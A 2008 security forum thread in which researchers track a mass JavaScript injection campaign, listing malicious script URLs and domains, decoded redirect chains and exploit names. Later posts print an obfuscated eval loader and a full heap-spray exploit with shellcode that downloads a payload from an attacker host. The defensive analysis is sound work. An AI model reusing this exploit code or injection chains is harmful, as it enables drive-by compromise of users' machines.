Author Topic: just collection(about 0.js, 1.js, ip.js)  (Read 18406 times)

0 Members and 1 Guest are viewing this topic.

May 09, 2008, 08:47:06 am
Read 18406 times

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
some domains is suspicious.
after May 5 2008

google : "<script src=http://" "0.js"
            "<script src=http://" "1.js"
            "<script src=http://" "2.js"
            "<script src=http://" "ip.js"
            "<script src=http://" f.js


<script src=hxxp://www.2117966.net/fuckjp.js></script>
<script src=hxxp://winzipices.cn/.js></script>
<script src=hxxp://c.uc8010.com/0.js></script>
<script src=hxxp://ucmal.com/0.js></script>
<script src=hxxp://rnmb.net/0.js></script>
<script src=hxxp://yl18.net/0.js></script>
<script src=hxxp://www.nmidahena.com/1.js></script>
<script src=hxxp://www.11910.net/1.js></script>
<script src=hxxp://xvgaoke.cn/1.js></script>
<script src=hxxp://www.nihaorr1.com/1.js></script>
<script src=hxxp://www.aspder.com/1.js></script>
<script src=hxxp://winzipices.cn/2.js></script>
<script src=hxxp://1.hao929.cn/ads.js></script>
<script src=hxxp://xprmn4u.info/f.js></script>
<script src=hxxp://www.414151.com/fjp.js></script>
<script src=hxxp://www.ririwow.cn/ip.js></script>              Email: 123_at_q.com    Registration Date: 2008-05-08 12:16
<script src=hxxp://www.bluell.cn/ip.js></script>
<script src=hxxp://9999.91.tc/ip.js></script>
<script src=hxxp://www1.xise.cn/ip/ip.js></script>
<script src=hxxp://bbs.jueduizuan.com/ip.js></script>

ririwow.cn, in the morning, May 9, 2008 (GMT+9) i find it.

=============================================================================
modifed.... Today at 07:04:51 AM

May 09, 2008, 11:16:02 am
Reply #1

sowhat-x

  • Guest
nihaorr1.com...this one was the domain,
from where the massive injection/infection was started a month ago...
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424

And nmidahena...this was serving exploits couple months ago...
Seems like it's a small world...since from what I read,it's closely connected with the above...

May 09, 2008, 01:04:12 pm
Reply #2

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Seems only a handful of those are still resolving;

Code: [Select]
219.232.233.82 c.uc8010.com
122.224.146.246 ucmal.com
122.224.146.246 www.ucmal.com
Error 9001 - Can't resolve host rnmb.net
Error 9001 - Can't resolve host www.rnmb.net
222.191.251.246 yl18.net
222.191.251.246 www.yl18.net
Error 9001 - Can't resolve host nmidahena.com
Error 9001 - Can't resolve host www.nmidahena.com
Error 9001 - Can't resolve host 11910.net
Error 9001 - Can't resolve host www.11910.net
159.226.8.140 xvgaoke.cn
159.226.8.140 www.xvgaoke.cn
60.169.3.130 nihaorr1.com
60.169.3.130 www.nihaorr1.com
60.172.219.4 aspder.com
60.172.219.4 www.aspder.com
60.191.239.229 winzipices.cn
60.191.239.229 www.winzipices.cn
Error 9001 - Can't resolve host hao929.cn
Error 9001 - Can't resolve host www.hao929.cn
Error 9001 - Can't resolve host 1.hao929.cn
Error 9001 - Can't resolve host www.1.hao929.cn
217.199.217.9 xprmn4u.info
217.199.217.9 www.xprmn4u.info
Error 9001 - Can't resolve host 414151.com
Error 9001 - Can't resolve host www.414151.com
Error 9001 - Can't resolve host ririwow.cn
Error 9001 - Can't resolve host www.ririwow.cn
Error 9001 - Can't resolve host bluell.cn
Error 9001 - Can't resolve host www.bluell.cn
60.190.243.202 91.tc
60.190.243.202 www.91.tc
60.190.243.202 9999.91.tc
219.232.224.81 xise.cn
219.232.224.81 www.xise.cn
219.232.224.81 www1.xise.cn
Error 9001 - Can't resolve host bbs.jueduizuan.com
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 09, 2008, 02:28:01 pm
Reply #3

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
suspicious

<script src=hxxp://www.caocaowow.cn/ip.js></script>
Registration Date: 2008-05-08 12:16

<script src=hxxp://www.msshamof.com/3rt.js></script>
<script src=hxxp://www.msshamof.com/4iu.js></script>
<script src=hxxp://www.z008.net/gm.js></script>
<script src=hxxp://b15.3322.org/e.js></script>
<script src=hxxp://free.hostpinoy.info/f.js></script>

"<script src=http://" ".js"    <- google show me 479 result.

<script src=hxxp://d39.6600.org/f.js></script>
<script src=hxxp://c11.8866.org/hxw/hx/f.js></script>

<script src=http:// f.js    <- google show me 379 result.

May 09, 2008, 02:38:04 pm
Reply #4

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Quote
Host:  caocaowow.cn 
Current IP:  Could not resolve host 

Quote
Host:  www.caocaowow.cn 
Current IP:  222.12.88.52 
IP PTR:  ZP088052.ppp.dion.ne.jp 
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 10, 2008, 12:00:37 pm
Reply #5

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
hxxp://computershello.cn/1.js
   hxxp://computershello.cn/2.js
      document.write("hxxp://winzipices.cn/5.js");

computershello.cn:
     ip : 60.191.239.221
     Registered date : 2008-05-10 02:22:05

hxxp://www.ririwow.cn/ip.js
                               ~~~
                          or   jp.js


if you decode hxxp://www.ririwow.cn/index.htm, you can see this message
Quote
FUCK FRANCE!  FUCK CNN!  I WILL ATTACK you ALWAYS  !
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276_at_163.com

changed messgae
Quote
This is a mass invasion.        Safeguard the motherland's dignity!
FUCK FRANCE!  FUCK CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276_at_163.com

hxxp://bbs.jueduizuan.com/jp.js
                                    ~~~
                               or   ip.js





hxxp://dj.jueduizuan.com/ri.exe

May 11, 2008, 09:38:26 am
Reply #6

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
Quote
<script src=http://www.wowyeye.cn/m.js></script>

decode
Quote
if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe src=hxxp://www.ririwow.cn/index.htm width=100 height=0></iframe>");}
google :  144 result

hxxp://dj.jueduizuan.com/ri.exe

May 11, 2008, 01:03:32 pm
Reply #7

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
<script src=hxxp://9i5t.cn/a.js></script>

Quote
<script src=hxxp://9i5t.cn/a.js></script>
   document.write ('<script language=javascript src=hxxp://computershello.cn/g.js>"></script>');
      hxxp://computershello.cn/6.gif
            hxxp://computershello.cn/le.htm
                  NOD32 : JS/Exploit.CVE-2006-1359.AI
                  hxxp://61.188.38.158/images/test.exe
                  clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
         hxxp://computershello.cn/tt1.htm
                  MS07-017 exploit
                  hxxp://computershello.cn/tt.gif
                        hxxp://61.188.38.158/images/test.exe
         hxxp://computershello.cn/vv.js
                  I don't know
         hxxp://computershello.cn/old.htm
                  I don't know
         // hxxp://computershello.cn/new.htm
                  hxxp://computershello.cn/test.htm
                  hxxp://computershello.cn/pp.htm
                        hxxp://computershello.cn/pp.js
                              hxxp://computershello.cn/6.gif
                                    hxxp://computershello.cn/le.htm
                                    hxxp://computershello.cn/tt1.htm
                                    hxxp://computershello.cn/vv.js
                                    hxxp://computershello.cn/old.htm
                                    hxxp://computershello.cn/xin.htm
                                    hxxp://js.users.51.la/1871344.js
                                    hxxp://www.51.la/?1871344
                                    hxxp://img.users.51.la/1871344.asp
         hxxp://computershello.cn/xin.htm
               clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93
               hxxp://61.188.38.158/images/test.exe  
      hxxp://computershello.cn/6.gif
      hxxp://js.users.51.la/1871424.js

May 11, 2008, 09:02:49 pm
Reply #8

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

May 12, 2008, 12:49:21 am
Reply #9

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
<script src=hxxp://www.direct84.com/7.js></script>

Quote
<script src=hxxp://www.direct84.com/7.js></script>
      document.write("<iframe src=hxxp://66.36.254.4/cgi-bin/index.cgi?zibzib width=0 height=0 frameborder=0></iframe>")
      document.write("<iframe src=hxxp://direct84.com/d/1.php width=0 height=0 frameborder=0></iframe>")

May 12, 2008, 12:58:57 am
Reply #10

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.direct84.com/7.js
Server IP: 99.227.84.105 [ CPE0050047d48ef-CM0016b5316076.cpe.net.cable.rogers.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 12 May 2008
Time: 01:52:55:52
*****************************************************************
document.write("<iframe src=http://66.36.254.4/cgi-bin/index.cgi?zibzib width=0 height=0 frameborder=0></iframe>")
document.write("<iframe src=http://direct84.com/d/1.php width=0 height=0 frameborder=0></iframe>")

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://66.36.254.4/cgi-bin/index.cgi?zibzib
Server IP: 66.36.254.4 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 12 May 2008
Time: 01:53:35:53
*****************************************************************
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript">
<!--
function G3K20Su53(H6U1P2tQ3,ATn7Koigy){var SA5yi7JD2 = new Array;var jUC7uLu8T = arguments.callee.toString() + location.href;var R1Y8C75ok = jUC7uLu8T.replace(/\W/g, "");var ynh74a78n = eval;R1Y8C75ok = R1Y8C75ok.toUpperCase();for(var aJrPPH7ks = 0; aJrPPH7ks < 256; aJrPPH7ks++) {SA5yi7JD2[aJrPPH7ks]=0;}var G4YmKx5D6 = Math.pow(2, 32);var Qi2qsaF4R = G4YmKx5D6 - 306674912;var BnFj4xWF0 = 1;for(var aJrPPH7ks = 128; aJrPPH7ks; aJrPPH7ks >>= 1) {BnFj4xWF0 = BnFj4xWF0 >>> 1 ^ (BnFj4xWF0 & 1 ? Qi2qsaF4R : 0);for(var j8SBk0Fn1 = 0; j8SBk0Fn1 < 256; j8SBk0Fn1 += aJrPPH7ks * 2) {var tiwS37EwT = j8SBk0Fn1 + aJrPPH7ks;SA5yi7JD2[tiwS37EwT] = SA5yi7JD2[j8SBk0Fn1] ^ BnFj4xWF0;if (SA5yi7JD2[tiwS37EwT] < 0) {SA5yi7JD2[tiwS37EwT] += G4YmKx5D6;}}}var Mf227XxKj = G4YmKx5D6 - 1;for(BnFj4xWF0 = 0; BnFj4xWF0 < R1Y8C75ok.length; BnFj4xWF0++) {var ebv8sk7T4 = (Mf227XxKj ^ R1Y8C75ok.charCodeAt(BnFj4xWF0)) & 255;Mf227XxKj = SA5yi7JD2[ebv8sk7T4] ^ Mf227XxKj >> 8 & 16777215;}Mf227XxKj = Mf227XxKj ^ (G4YmKx5D6 - 1);if (Mf227XxKj < 0) {Mf227XxKj += G4YmKx5D6;}Mf227XxKj = Mf227XxKj.toString(16).toUpperCase();while(Mf227XxKj.length < 8) {Mf227XxKj = "0" + Mf227XxKj;}var AltW1j1Wa = new Array;for(var aJrPPH7ks = 0; aJrPPH7ks < 8; aJrPPH7ks++) {AltW1j1Wa[aJrPPH7ks] = Mf227XxKj.charCodeAt(aJrPPH7ks);}var YUHuOVbmt = "";var KVT5YJ3Ck = 0;for(var aJrPPH7ks = 0; aJrPPH7ks < H6U1P2tQ3.length; aJrPPH7ks += 2){var tiwS37EwT = H6U1P2tQ3.substr(aJrPPH7ks, 2);var I5oY04X8x = parseInt(tiwS37EwT, 16);var AW5kX4rc7 = AltW1j1Wa[KVT5YJ3Ck];var LV62HKm5H = I5oY04X8x - AW5kX4rc7;if(LV62HKm5H < 0) {LV62HKm5H = LV62HKm5H + 256;}YUHuOVbmt += String.fromCharCode(LV62HKm5H);if(KVT5YJ3Ck + 1 == AltW1j1Wa.length) {KVT5YJ3Ck = 0;} else {KVT5YJ3Ck++;}}var i1mbL65F5 = 0;try {ynh74a78n(YUHuOVbmt);} catch(e) {i1mbL65F5 = 1;}try {if (i1mbL65F5) {window.location = "/";}} catch(e) {}}
//-->
</script>
</head>
<body onload="G3K20Su53('99A7b2a9a59ca5a55395787d64778C6B68776C9768636c7E6b62797B5D8267A98cA8AE7866a25fB2a993B666a46a8c78A37C8B7884537357a197bb6672A5a898ac6dbaA7a353976a9C84B27BA06399577052a5b898a8A39ca1A6B7749494a2a3989772BAA086aaA99cA0ab6E5A5361579fA1A7a7a59ca5a5619Ab6AB976eAC98a552BA8e997CAC7FA07Dbb666E53976A9C84B27Ba0639965a597b4b292969b5F628e9B75985f5659555B7FBC92a5568674838B786888A37e536F64abA794A272A97AAC8fA77bA382aa528166a77b9E80A97aB191a861AAA688a2B4abA37697aa985a6d8197A2a85fA993B666956bA06A8a66787d67537357636d64AA699D698e67667B7c516f566968687f66956bA06A8a66787D675E616053ADB77d8774A6817A6497a1956BA06A8A66787D679073676EafBAA7A3537F836668899972869D57705291A7a59B64A7A2a96C785d5369695C6DBAa7A3539AAE646a8F8B62767E5770528D9264697b8a7485AB665e53696769687b7a6A646872A993b666A365ae6765A5abA87D537357646daaB5a35bAC98A552A87E9B668D6B67697a666E5367696b6D64AA699D698e67667B7C6c539a6f9D659B7a656a6C5771708166625C56b2a564bc7663A69D997F528166a365ae6765A5ABa87D537475715275668F535ea965aa7478A49A9883535864775172569baa637C917664797f536C64765A6e9ca6a55ABAA7a35377a39B697b7694786D57705274815174a29F6a6974a9766A56735364797C6c5377A39B697b7694786d575E6f64AA699D698e67667b7C515d56695c52bfbc92A5568c6B987cAB6463999f536F64879d9b6d6E6395897d515E569B6b9C779d65676d6d6ea57B9C72A3807e65859f9B69996E9c6662a7ae8E537357a6699A87a17d7d69868D85B2996a6D6796777BA3519156a965AA7478a49A98836E9Baa6659A66D8d74a28E8D6386918c6B987Cab6463999F90528066615c56B2a6699a87A17D7D69868D997E976b9b6A6395ACA3515E73577C7E777C7686778A9a6DC1C3AEa997a9538775877daa6b9f667E6483517C826a69779787849a566453637fACA0A55Ea965AA7478A49a9883536F64766c53A869AB6276b9989582576F52ba8e997Cac7fA07dbb749D98A49EA79a7f66A365AE6765a5ABa87d5e616053ADBAa7A353996f7999b07D6176685770526C9B627482AE689A7792519156AD7b9a8DBC79a081ae6195aca7a376A59b9873B86eA365AE6765A5ABA87d5C5f575952767B666E8b68747ebb7B996682577052b77d8774a6817a6497a1946B7C9e9F69748963905695538775877dAA6B9F667E64846F536E575952757c686A6d6964677fc386647783aa67AC797D53735788638592a8689e6a7f52a266597C826A69779787849a566453636d819A99565F88638592a8689E6a7F528066615c56B288638592a8689e6A7f526f83517C826A69779787849A71B488638592A8689E6a7f52816686647783AA67AC797D61AAa686A6b6af9F9a5E68695B72BAA088A6A798A487a7a4985e606Ea9acaf9D985E8C647390bd669b6983619EA9B498A79E576f527C6f51ae8B68747ebb7B99668257705266765353615788638592a8689E6A7F6DC1bc92A556866695b09b86829799536F64b496aa5678A5a4a5bf6c99A5a95ba8a5B851976ea16689787a6869567453627F66956BA06a8A66787d675372576b6d64AA699D698e67667B7c5C5e5F57AE8177a99D888b8694949Faa699D698e67667b7C8e53735788638592a8689e6A7f60A7AE92a579A6979785BA59976eA16689787A68695F72b0a8A5B851968d6c7f7791b49a66567453546681a794a8578984ab8a75757B6883528166616e9Ca6a55Abaa7a3539A6f9D659b7A656a6C577052748151976ea16689787A6869567353837b76677A6e67686772b296a19Dab9B6d64AA699d698E67667b7C515e7357655Bbfbc92a5568c6B987cab6463999f536F649768636c7e6b62797b5fa6AB99A6A6b66e956Ba06A8a66787d675F56695c6DBAa7A353998C6665bd78949B86577052B4a7a3A69B80A1a66c9b69996E9c6662a7ae5d53676d5C6DbaA7a353AD6D6483AE7B678CA45770529379949F8B8C8293A6A187859D7b77748977819071ad94A4649B696B806cA78ABA795170569A886577bf63969e87535f64BD676487A168689db46C9C9c5F886A7C9066A78ead66528066615c56b2886a7C9066A78Ead66528166866b6e8168A69cbc6453615765677A81ae968D6C7f7791B49a665662705297BAA39cA49e6198b6B59e769E98a575b3aa965B8b6F6b7c79ba89A969606e9baa6E87859D7b7774897781536157645281835182699a9F879995929564A398a0abba995C56B28984ab8A75757b6883528166616Eb357989eb7AB51ae8C899a768888766486625e6dC1c3a794a8579562B8777588ab6f95528166616Eaaa9ac52BF9572847D696a87b18d59968D6C7F7791B49A665f72b052a7a7A5969e5F985B64C19363aa687787B97E93537357646dC1baa3AC56b29C98646e9363AA687787b97e935C56b2AA9Bb2aaa0aa64A3A295a5BA9Aa2a45770526675536eB3b45395a5BA949B5E9c5c52bfc3ae3d996B6a65889c65687b5f5A667779976C7b787467797b6a686F707693797F69747799646Ba57F9774796d696Aa77d966B98999673797d726C996e7567AA7b6675666C6465aa7976676898986B7B8768686B6f6873747c6969986f6c6A7d7F676A6d6e7966767973747B706C737c7b66747c6f6b6A75A769696F9867937B8774686b6f6467797F976c6f98986b8a7F746C6C996b73788764696c706C937a87666b6878779377a76194976F786B86A768946E787793787f976a696b68667487736C6C996967797f676a799963687B7F656b697097737b7b626A6B6c6b68777C6767686B7873867F6394976C6b6BA57e616b676F9668A8a765746b9963677a7d63686B6d6968797C6368976E666677797767686b9893a77f6a746778676B867b75689A986C697da76A696F706A6A787e76746d6D6769767B6275686e966a76A794696c7963737a8769696c786493787F6A6c7779766a787F6869666c9469757E696b6B6d6968757b626c7a6e7673897c676C6A70656aA9a76469696d6c67aa7B76686B6d6869767b62696b6D6c67AA7B6695666c64658a7992747B706C937c7b66946e6E966A7D87616B6f706369877F76686B6f646779a7936A796f6793a87C679467996893a77B776c7898636b7B87686a6C796B67887f676a797963687b7f656B697077737b7b9469986d6469757a63669C6c6465AA797294677098677A7b95746e6e766a7DA7616B6F706369a77f76686B6F6469767b6268776D6c677C7b7667686B78658979726C996f666A767D95699A996A7376876A686E6E68677A7B68696B6E69677B7c94676b6b65658a7f927467796a6b857B6274677078677a7B95746e6E966a7d87616b6f706369877f76686b6F6469767b6268976D74677c7B7667686b7865a979926c796f666A767d95697a796a7376a76A686E6e68677A7B68696B6E6a677b7C74676b6b6565AA7F729467996A6b857B6294677098677a7b95746E6E966a7DA7616B6f706369A77f76686B6F6469767b6268976d75677c7b7667686b7865A979726C796F666A767d75697a796A9376876a686e6E68677A7B68696B6E6B677B7C74676b6b6565AA7f729467796A6b857b6294677078677a7B75946e6E966A7d87616b6f706369877f96686b6f6469767b6268976d96677c7b9667686B98658979726c796F666A767d95697a996a9376A76A686E6e68677a7b68696b6e6C677b7c74676B6B65658A7F729467796A6b857b6274677078677a7B95746E6e966A7d87616B6f706369877f96686B6F6469767B6268776d77677C7B7667686b9865A979726c796F666A767d75697A996A9376876a686e6E68677a7b68696b6e74677B7C94676B6B6565AA7F929467996a6b857b6274677078677a7B75746e6e766A7da7616B6f706369A77f76686b6F6469767b6268976D78677C7b9667686B7865A979726C796f666A767D75697a796a7376876A686e6E68677a7B68696b6E75677b7c74676b6b6566777977667B98976Ba67B62696670966A757e626A7A6e76937c7f9695666C6b677b7D63686b6D6968797C6368776D6466777997667B6B776B7BA7646C9A706C93757d6167686b989476797667686b6866747f766c986D6767a87f666B696F6769897c75746e996493A87b626A6b6E68677A7B68696b6e68677b7b62687B6C78677A87776A6f706393a77C63746a786C73887c646C7b79656b7D7f6775666f6a6b877b95686d70696Ba57F756C7A706c737D7f92686b6f6a6B7a7f976C7978646b857f67746F786c677b7b95686E6D6B67aa7B66686c6F6467797b76696F6D6466777977667b986B6A747d756B666e63737Da763949A6D6769767b6268976D6b68897b686a666c6465AA797667686b686674A7936C6c796967797d68946E98996A747F9494986F756A787b626a6b6C6b93787f67747878776B877F639499986a937c7c64946E9997737C87666C7a98686a767F677469787573857F636c7C70776878A76994979869937C876674776D63687a7c62686B6e6868797B926a696b68667487736C6c79696779a766697798966Aa57e686A6e7974737c7B626a6B6C6B677C7b686A666C6465aa799667686b6866747f73946A7969678887686C6f7874677a87766c986F756A897F6174686E7673747D63696B6e7973897f686a9c70646B797f776A6F989869757D68746e78796a747f7494986f956a787b97746A707773787F94946F9896697487726C7B6e796A8A7F656c9C6f6b6baa7B9469696D64677a886167686b7865A9876a6b689895937A7E72946779776A877B626a6b6c6B69a7A76674796f786B8787686A9c6F6A68787F696C7a9868937b7d65946D70966BA67d67746f6d9693A97F686a9C70646B797F776A6f989867897b977479786a6A7d876a946d787793777f6969666D6c68877B766A666c6465AA797667686B646BAA7f73686b6d7673887d939498986B6a86A762747b709567797C95686E6d94678a7a63667c6b776589A766699798966a857e686a6e7974937C7B6269696E68677A7B68696b6D696974797667686B6866747976946f6e69737D7e666B776E757387a769686B6D9969767b6275666f65737d87666B97796393A97E696a696B686674886367686b7866767973949C98636BaaA7626c976D96937D7c6474796F766a7C7D699498796A68777F756C7A78696Ba8876A6c7A6D6769757B6269976d6b67AA7a63667C6b77737d7c6494996f966A7c7d699498996A67797B746A6B6c6B677c7c66696B6D696974799667686B6866747a63667c99946B7Aa764686E6e6c93757c74696E70686a7C7F636A776C6B69777b666c6f6f796A757D6A6A66787593778775686b6D9967798766697778766AA57E686A6E9994737C7C94676b6b6573877f67946d6d676a797f946B69786A6a857C6A69996F9967797C76686e707673797f69747799646ba57f7774796d696B7D87686c777868737D7f676A9a98676b86a7636c779965937d7b6A687798956b7d87686C9b9967737D7B6469676e66667779976b6b78796a74A7616B996D7668887e616969996a6b85a7666a6f9896738587686C9b786993A587666c7a6d63677c876A747B79676ba57B64696A6C6B677ca76A6c779996937d7c617468706c93A77f67746e786A937b7f72746e7876677C7b766A666c6465aa7e6294696F6693797E6a696f6e956a747B979498707793a57d67746f996B737b7f726c77989773857f92687a6d69737c87646c786c9468767B66686D7876937d8766946E6e6568797C6569786e7468777c65697b6d69687C7c92696f6e65687D7C616C7870996b8A7c636C6d787773777c61746798696B857f72747a6e656B7C7F6994676e6A688A7C66696d6e6a68A67f6369977096687A7C66696B6E6768797C64699a6E63687A7C6669776E6768897C656A676E636b7b7f69696B6e9468797c62696e6D6B687a7C66696b6E6768797c646C796E63687A7c6a6c98786c6B7D7f636C7B7098677C7b6669666D67697A7F94697c6d956A7B7E696c6c6f6967A97c74676b6b656B85A7656c6e996C93767f67746C787668787F68746A786b93A97B976C6F986b737a7f929469986B697c7f6a946798676Ba57B756B6b78796A74A7616b996d7668887E61687b6E7966767993756B6b6866746d5A6E')">

</body>
</html>


The following returned a 200 (OK) status code, but no content ......

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://direct84.com/d/1.php
Server IP: 172.163.165.232 [ ACA3A5E8.ipt.aol.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 12 May 2008
Time: 01:54:18:54
*****************************************************************
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 12, 2008, 01:03:18 am
Reply #11

sowhat-x

  • Guest
Heh,I was doing/wondering exactly the same thing,
if I had missed something somewhere there...probably it will return back in a couple of hours...

May 12, 2008, 01:08:26 am
Reply #12

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Even more interesting, they're using two different servers (both home lines too) for the same domain (rogers.com for the www. and AOL for the PD).

I thought they'd have the same files on both but alas apparently not :(
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 12, 2008, 01:51:46 am
Reply #13

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
connedted hxxp://www.direct84.com/

Code: [Select]
<html>
<head>
<script language="JavaScript">
var mm = new Array();
var mem_flag = 0;

function h() { mm=mm;a=1;setTimeout("h()", 2000); }

function getb(b, bSize)
{while (b.length*2<bSize){b += b;}
b = b.substring(0,bSize/2);return b;}

function fEtEgRTe2(){
var zc = 0x0c0c0c0c;
var a = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u772F%u7777%u642E%u7269%u6365%u3874%u2E34%u6F63%u2F6D%u6F6C%u6461%u702E%u7068%u4D3F%u4953%u0045");
var heapBlockSize = 0x400000;
var pls = a.length * 2;
var bSize = heapBlockSize - (pls+0x38);
var b = unescape("%u0c0c%u0c0c"); b = getb(b,bSize);
heapBlocks = (zc - 0x400000)/heapBlockSize;

for (i=0;i<heapBlocks;i++){mm[i] = b + a;}

mem_flag = 1;
h();
return mm;
}

function NUkI1pMSJzW9(num)
{
if (num == 0) {
try {
var tmp = "\x0D\x0D\x0D\x0D";
var tmp_size = 1044;
var DXMedia = document.createElement("object");
DXMedia.setAttribute("classid", "clsid:201E"+"A564-A6"+"F6-11"+"D1-81"+"1D-00C"+"04FB"+"6BD36");
if (! mem_flag) fEtEgRTe2();
while(tmp.length < (tmp_size * 2)) tmp += tmp;
tmp = tmp.substring(0, tmp_size);
DXMedia.SourceUrl = tmp;
num = 255;
} catch(e) { }
if (num = 255){ setTimeout("NUkI1pMSJzW9(1)", 2000);} else{ NUkI1pMSJzW9(1);}
}else if(num == 1){
try{
pnghtml = '<embed autostart="true" src="buf.png" type="video/x-ms-wmv" width="1" height="1" controls="ImageWindow" console="cons"></EMBED>';
if (! mem_flag) fEtEgRTe2();
document.getElementById('BRB2vms').innerHTML = pnghtml;
num = 255;
} catch(e){}
if (num = 255){ setTimeout("NUkI1pMSJzW9(2)", 2000);} else{ NUkI1pMSJzW9(2);}
}else if(num == 2){
try{
emhtml = '<EMBED  width="1" height="1" SRC="----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"></EMBED>';
if (! mem_flag) fEtEgRTe2();
document.getElementById('BRB2vms').innerHTML = emhtml;
num = 255;
} catch(e){}
if (num = 255){ setTimeout("NUkI1pMSJzW9(3)", 2000);} else{ NUkI1pMSJzW9(3);}
}else if(num == 3){
try {
var qt = new ActiveXObject('Quick'+'Time.Qu'+'ickTime');
if (qt) {
var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
'<param name="src" value="qt.php">'+
'<param name="autoplay" value="true">'+
'<param name="loop" value="false">'+
'<param name="controller" value="true">'+
'</object>';
if (! mem_flag) fEtEgRTe2();
document.getElementById('BRB2vms').innerHTML = qthtml;
num = 255;
}
} catch(e) { }
}
}


function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
